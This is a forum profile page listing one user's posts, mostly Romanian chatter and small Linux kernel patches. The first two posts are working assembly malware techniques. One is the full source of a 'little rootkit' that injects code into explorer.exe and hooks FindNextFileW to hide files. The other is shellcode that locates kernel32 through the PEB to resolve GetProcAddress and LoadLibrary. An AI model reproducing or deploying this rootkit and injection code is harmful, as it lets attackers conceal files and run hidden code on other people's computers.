Nytro
-
Posts
18785 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect. ; ******************************************************* ; *** Example of a little rootkit that hide all the *** ; *** files that begin with "~" without use Dll. *** ; *** *** ; *** By E0N (L) 2008 *** ; ******************************************************* include 'H:\archivos de programa\fasm\include\win32ax.inc' .data HookApi db 'FindNextFileW' , 0 ; Name of the api to hook HookDll db 'Kernel32.dll' , 0 ; Name of the DLL that contain it DirApi dd ? ; Direction of the api to hook process dd ? pid dd 2160 ; PID of the process to hook x dd 7 ; Number of bytes that have the api at begin BufferCall dd ? ; Buffer to call the api api (in our process) inyBufferCall dd ? ; Pointer to the buffer to call the api when injected tamFun dd ? ; Size of function that will replace the api inyFun dd ? ; Pointer to this buffer when injected BufferApi dd ? ; 5 bytes buffer for replace the begin of api struct Datos sBufferCall dd ? ; Pointer to inyBufferCall to can call the original api ends dat Datos ? SizeofDatos dd 4 dirStruct dd ? ; Pointer to structure when injected Prote dd ? ; To call VirtualProtect .code start: ; Get handle of process when we will inject mov eax, PROCESS_VM_OPERATION or eax, PROCESS_VM_WRITE invoke OpenProcess, eax, FALSE, [pid] mov [process], eax ; Get direction of api to Hook invoke GetModuleHandle, HookDll invoke GetProcAddress, eax, HookApi mov [DirApi], eax ; Make the buffer to call the api: ; x bytes | 1 byte | 4 byte | 1 byte ; x first bytes of api | push [0x68] | DirApi + x | ret [0xC3] mov eax, dword [x] add eax, 6 invoke LocalAlloc, LPTR, eax ; eax = x + 6 mov [BufferCall], eax invoke RtlMoveMemory, [BufferCall], [DirApi], [x] ; Copiamos los x primeros bytes del api mov eax, [BufferCall] add eax, [x] mov byte [eax], 0x68 inc eax mov ebx, [DirApi] add ebx, [x] mov dword [eax], ebx add eax, 4 mov byte [eax], 0xC3 ; Inject this buffer mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT mov ecx, [x] ; ecx = x + 6 add ecx, 6 invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE mov [inyBufferCall], eax mov ebx, [x] ; ebx = x + 6 add ebx, 6 invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL ; Initialize the structure mov eax, [inyBufferCall] ; Metemos el puntero al buffer para llamar mov [dat.sBufferCall], eax ; con normalidad al api ; Inject structure mov eax, MEM_RESERVE or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE mov [dirStruct], eax invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL ; Change the 0x0000 for a pointer to the structure mov ebx, CAMBIO ; ebx = El 0x0000 que hay que cambiar (4 bytes) sub ebx, 4 invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote invoke RtlMoveMemory, ebx, dirStruct, 4 ; Calculate the size of the function to inject mov eax, FIN_MyFindNextFileW sub eax, MyFindNextFileW mov [tamFun], eax ; Inject the function mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE mov [inyFun], eax invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL ; Make a buffer to hook the api ; 1 bytes | 4 bytes ; jmp [0xE9] | Size of jump invoke LocalAlloc, LPTR, 5 mov [BufferApi], eax mov byte [eax], 0xE9 inc eax mov ebx, [inyFun] sub ebx, [DirApi] sub ebx, 5 ; 5 = -1 por el 0xE9 y -4 por la dirección mov dword [eax], ebx ; Inject this buffer in the begin of api mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL invoke ExitProcess, 0 ; Funtion that will replace the api proc MyFindNextFileW hFindFile, lpFindFileData OK: mov ebx, 0x0000 ; This 0x0000 will do a pointer to the buffer before inject CAMBIO: push [lpFindFileData] push [hFindFile] call dword [ebx] mov ebx, eax cmp ebx, 0 je RETORNAR_FIN mov eax, [lpFindFileData] ; add eax, 44 cmp byte [eax], '~' je OK mov eax, 1 ret RETORNAR_FIN: mov eax, 0 ret endp FIN_MyFindNextFileW: .end start In conclusion, is a little-rootkit without dll.
-
Credits : HUTCH pour la fonction StringCompare PHRACK pour le tips pour récuperer K32 Reference : NEITSA pour la méthodo Author: steve10120 call .hwndDelta .hwndDelta: pop ebp sub ebp, .hwndDelta .find_kernel: mov eax, [fs:30h] ;EAX = PEB base mov eax, [eax + 0ch] ;EAX = PEB_LDR_DATA mov esi, [eax + 1ch] ;first entry in InInitializationOrderModuleList lodsd ;forward to next LIST_ENTRY mov ebx, [eax + 08h] ;EBX = Kernel32 base memory mov [ebp + _kernelBase], ebx mov esi, dword[ebx + 3Ch] ;ESI = PE MAGIC add esi, [ebp + _kernelBase] mov edx, [esi + 078h] ;EDX = RVA table export add edx, [ebp + _kernelBase] ;EDX = VA table export mov ecx, [edx + 018h] ;ECX = nombre d'export de la DLL mov [ebp + _function_nb], ecx mov ebx, [edx + 020h] ;EBX = VA du pointeur de nom add ebx, 4 add ebx, [ebp + _kernelBase] ;EBX = VA table export ;A partir de la on a tous les éléments pour rechercher les fonctions ;Recuperation de GetProcAddress pushad lea edi, [ebp + _szGetProcAddress] ;EDI = GetProcAddress string call .find_function mov [ebp + _getProcAddress], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Recuperation de LoadLibrary pushad lea edi, [ebp + _szLoadLibrary] ;EDI = GetProcAddress string call .find_function mov [ebp + _loadLibrary], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;TEST MESSAGEBOX ; lea ebx,[ebp +_szUser32] push ebx call [ebp +_loadLibrary] ; lea ebx,[ebp +_szMessageBox] push ebx push eax lea edx, [ebp +_getProcAddress] call dword[edx] ; push 0 lea esi, [ebp +_szGetProcAddress] push esi lea edi, [ebp +_szGetProcAddress] push edi push 0 call eax ;;;;;;;;;;;;;;;; ret .find_function: .find_function_loop: mov esi, dword[ebx] ;ESI = RVA STRING FUNC add ebx, 4 add esi, [ebp + _kernelBase] ;EBX = VA STRING FUNC dec ecx ;ECX = ECX - 1 call .stringCompare cmp eax, -1 je .find_function_loop mov ebx, [edx + 01ch] ; ebx = export table address RVA add ebx, [ebp + _kernelBase] ; pointeur vers table d'export mov edx, dword[_function_nb] sub edx, ecx imul edx, edx, 4 add ebx, edx mov eax, ebx mov eax, dword[eax] add eax, [ebp + _kernelBase] ret .stringCompare: pushad mov ecx, esi mov edx, edi .cmst: mov al, [ecx] cmp al, [edx] jne .no_match add ecx, 1 add edx, 1 test al, al jne .cmst popad xor eax, eax ret .no_match: popad mov eax, -1 ret _szGetProcAddress db "GetProcAddress",0 _szLoadLibrary db "LoadLibraryA",0 _kernelBase dd ? _function_nb dd ? _szMessageBox db "MessageBoxA",0 _szUser32 db "user32.dll",0 _getProcAddress dd ? _loadLibrary dd ?
-
Nu dai si tu de baut? :->
-
Da, utilizatori (useri) porno.
-
Da, tipic. Windu: O sa vezi multe astfel de comentarii, sugestia mea e sa nu le iei in seama.
-
Voi chiar ati descarcat ce a postat? Dupa ce v-a spus ce contine?
-
Unde a fost? Putea sa participe oricine?
-
Topic de cacat. Au rezultat 8 avertismente care au dus la cateva banuri. Se muta la gunoi.
-
Binary Code Modification [Patching Vulnerabilities] Download: http://www.securityarchitect.org/binary-english.pdf
-
Dragut, toate posturile nu au nici o legatura cu acel program, deci toate au primit warn. Si au rezultat 3 banuri. In caz ca nu ati observat, am revenit
-
Ce anume? Ca te redirectioneaza la un link lung? O amarata de linie de cod. HTTP/1.1 302 Found Connection: close Date: Fri, 22 Oct 2010 19:32:30 GMT Location: You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/Ass Server: Apache/2.2.9 (Debian) PHP/5.2.14-0.dotdeb.0 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Client-Date: Fri, 22 Oct 2010 19:32:30 GMT Client-Peer: 81.20.136.200:80 Client-Response-Num: 1 Client-Warning: Redirect loop detected (max_redirect = 7) X-Powered-By: PHP/5.2.14-0.dotdeb.0 Headerele HTTP. Un Location...
-
Pe Linux folosesti compilatoarele de la GNU: gcc si g++. Atentie, daca esti obisnuit sa lucrezi cu Borland C o sa fie nevoie de niste schimbari, limbajul nu mai e chiar ca acum 20 de ani pe vremea cand a aparut acel compilator. Pe Windows folosesti CodeBlocks sau DevC++. Compilatorul folosit de ambele de MinGW, portarea pe Windows a compilatoarelor GNU. Citeste cu antetie mesajele de eroare, sau avertismentele si cauta-le pe Google daca nu intelegi ce vor sa spuna.
-
Topicul asta e spam
-
Din fericire noi nu avem de ce sa ne facem griji, daca e trenul la 200 de metri poti bea linistit doua beri pana ajunge.
-
Maine plec la Bucuresti, deci cateva zile nu o sa pot face mare lucru. Mie imi spuneti asa: "Vreau un program care sa faca asta (sa posteze commenturi pe wordpress de exemplu)" si o sa fac ce pot. Dar nu stiu cat timp nu voi avea net acolo.
-
[PATCH] /fs/qnx4/namei.c (2.6.35.6): Uninitialized variable warning --- a/fs/qnx4/namei.c 2010-09-27 03:19:16.000000000 +0300 +++ b/fs/qnx4/namei.c 2010-09-27 22:40:39.249566930 +0300 @@ -101,7 +101,7 @@ static struct buffer_head *qnx4_find_ent struct dentry * qnx4_lookup(struct inode *dir, struct dentry *dentry, struct nameidata *nd) { - int ino; + int ino = 0; struct qnx4_inode_entry *de; struct qnx4_link_info *lnk; struct buffer_head *bh; Warning: fs/qnx4/namei.c: In function ‘qnx4_lookup’: fs/qnx4/namei.c:104: warning: ‘ino’ may be used uninitialized in this function
-
[PATCH] /fs/omfs/file.c (2.6.35.6): Simple variable initialization --- a/fs/omfs/file.c 2010-09-27 03:19:16.000000000 +0300 +++ b/fs/omfs/file.c 2010-09-27 22:36:44.800566930 +0300 @@ -222,7 +222,7 @@ static int omfs_get_block(struct inode * struct buffer_head *bh; sector_t next, offset; int ret; - u64 new_block; + u64 new_block = 0; u32 max_extents; int extent_count; struct omfs_extent *oe; Warning: fs/omfs/file.c: In function ‘omfs_get_block’: fs/omfs/file.c:225: warning: ‘new_block’ may be used uninitialized in this function
-
[PATCH] /fs/ocfs2/slot_map.c (2.6.35.6): Uninitialized variable --- a/fs/ocfs2/slot_map.c 2010-09-27 22:27:07.605568537 +0300 +++ b/fs/ocfs2/slot_map.c 2010-09-27 22:27:29.342567489 +0300 @@ -357,7 +357,7 @@ static int ocfs2_map_slot_buffers(struct { int status = 0; u64 blkno; - unsigned long long blocks, bytes; + unsigned long long blocks, bytes = 0; unsigned int i; struct buffer_head *bh; Warning: fs/ocfs2/slot_map.c: In function ‘ocfs2_init_slot_info’: fs/ocfs2/slot_map.c:360: warning: ‘bytes’ may be used uninitialized in this function fs/ocfs2/slot_map.c:360: note: ‘bytes’ was declared here
-
Am si eu o carte scrisa de el, dar nu am apucat sa o citesc.
